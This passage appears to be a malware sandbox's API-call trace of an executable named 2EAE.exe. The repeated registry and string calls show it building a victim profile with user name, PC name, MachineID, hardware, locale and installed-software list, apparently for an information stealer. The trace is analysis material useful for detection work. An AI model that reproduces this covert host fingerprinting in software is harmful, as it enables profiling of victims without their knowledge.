RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.937] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 " [0175.938] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001" [0175.938] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\n" [0175.938] RegCloseKey (hKey=0x354) returned 0x0 [0175.938] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x2d, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-00A1-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.938] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-00A1-0409-0000-0000000FF1CE}") returned 90 [0175.938] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-00A1-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.938] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft OneNote MUI (English) 2016", lpcbData=0x197fd4*=0x25) returned 0x0 [0175.938] lstrlenA (lpString="Microsoft OneNote MUI (English) 2016") returned 36 [0175.938] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft OneNote MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 